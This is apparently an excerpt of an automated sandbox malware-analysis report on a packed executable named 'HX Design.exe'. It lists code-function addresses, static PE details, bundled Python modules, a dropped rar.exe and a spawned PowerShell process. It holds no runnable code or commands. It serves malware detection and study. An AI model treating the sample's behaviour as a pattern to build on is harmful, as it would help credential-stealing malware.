              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311EE21_2_00007FFE00311EE2
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003116181_2_00007FFE00311618
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003126171_2_00007FFE00312617
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311A0F1_2_00007FFE00311A0F
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0038AC801_2_00007FFE0038AC80
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0031149C1_2_00007FFE0031149C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311CBC1_2_00007FFE00311CBC
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311B541_2_00007FFE00311B54
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0031117C1_2_00007FFE0031117C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003127021_2_00007FFE00312702
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003124DC1_2_00007FFE003124DC
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003117F81_2_00007FFE003117F8
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0037D2D01_2_00007FFE0037D2D0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311C121_2_00007FFE00311C12
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003836501_2_00007FFE00383650
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4C30278_2_00007FFD9A4C3027
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21AE1073_2_00007FF77D21AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D200A2C73_2_00007FF77D200A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D227B2473_2_00007FF77D227B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FABA073_2_00007FF77D1FABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FB54073_2_00007FF77D1FB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F188473_2_00007FF77D1F1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F82F073_2_00007FF77D1F82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20118073_2_00007FF77D201180
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2054C073_2_00007FF77D2054C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23AE5073_2_00007FF77D23AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FCE8473_2_00007FF77D1FCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D208E6873_2_00007FF77D208E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24FE7473_2_00007FF77D24FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23EEA473_2_00007FF77D23EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22AF0C73_2_00007FF77D22AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F9EFC73_2_00007FF77D1F9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D220D2073_2_00007FF77D220D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D239D7473_2_00007FF77D239D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D241DCC73_2_00007FF77D241DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D201E0473_2_00007FF77D201E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FEE0873_2_00007FF77D1FEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22804073_2_00007FF77D228040
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20303073_2_00007FF77D203030
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22007473_2_00007FF77D220074
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21C05C73_2_00007FF77D21C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21010473_2_00007FF77D210104
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2500F073_2_00007FF77D2500F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D225F4C73_2_00007FF77D225F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D25AF9073_2_00007FF77D25AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22C00C73_2_00007FF77D22C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D234FE873_2_00007FF77D234FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D25DFD873_2_00007FF77D25DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22FA6C73_2_00007FF77D22FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D235A7073_2_00007FF77D235A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D25AAC073_2_00007FF77D25AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FCB1473_2_00007FF77D1FCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22D91C73_2_00007FF77D22D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21D97C73_2_00007FF77D21D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F49B873_2_00007FF77D1F49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2369FD73_2_00007FF77D2369FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D208C3073_2_00007FF77D208C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D235C8C73_2_00007FF77D235C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FDD0473_2_00007FF77D1FDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D219D0C73_2_00007FF77D219D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D246D0C73_2_00007FF77D246D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D234B3873_2_00007FF77D234B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D249B9873_2_00007FF77D249B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24766073_2_00007FF77D247660
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2586D473_2_00007FF77D2586D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2086C473_2_00007FF77D2086C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22A71073_2_00007FF77D22A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23071073_2_00007FF77D230710
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23270073_2_00007FF77D232700
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21F5B073_2_00007FF77D21F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20859873_2_00007FF77D208598
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22F59C73_2_00007FF77D22F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24260C73_2_00007FF77D24260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2265FC73_2_00007FF77D2265FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F888473_2_00007FF77D1F8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20289073_2_00007FF77D202890
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2418A873_2_00007FF77D2418A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23190C73_2_00007FF77D23190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22090473_2_00007FF77D220904
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2238E873_2_00007FF77D2238E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2017C873_2_00007FF77D2017C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2167E073_2_00007FF77D2167E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FF24C73_2_00007FF77D1FF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21724473_2_00007FF77D217244
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20E21C73_2_00007FF77D20E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24226873_2_00007FF77D242268
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20D2C073_2_00007FF77D20D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2302A473_2_00007FF77D2302A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24131473_2_00007FF77D241314
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1F42E073_2_00007FF77D1F42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23216473_2_00007FF77D232164
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2541CC73_2_00007FF77D2541CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2381CC73_2_00007FF77D2381CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23546873_2_00007FF77D235468
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21D45873_2_00007FF77D21D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D1FA50473_2_00007FF77D1FA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24832C73_2_00007FF77D24832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20236073_2_00007FF77D202360
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D22037473_2_00007FF77D220374
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D21C3E073_2_00007FF77D21C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: String function: 00007FF77D2349F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: String function: 00007FF77D208444 appears 48 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFDFB311E20 appears 33 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FF732062910 appears 34 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFDFB2E9340 appears 136 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFDFB2EA500 appears 179 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFE0038D341 appears 830 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFE0038D32F appears 216 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFE0038DB03 appears 33 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFE0038D425 appears 33 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FFE00311325 appears 357 times
              Source: C:\Users\user\Desktop\HX Design.exeCode function: String function: 00007FF732062710 appears 104 times
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: HX Design.exeBinary or memory string: OriginalFilename vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000000.1667676995.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1679525523.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs HX Design.exe
              Source: HX Design.exeBinary or memory string: OriginalFilename vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2111777283.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2110274532.00007FFE1026A000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2113209650.00007FFE1A46A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2110572215.00007FFE10313000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2111512899.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2112595891.00007FFE13318000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2109662919.00007FFE0E183000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2110927922.00007FFE11526000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HX Design.exe
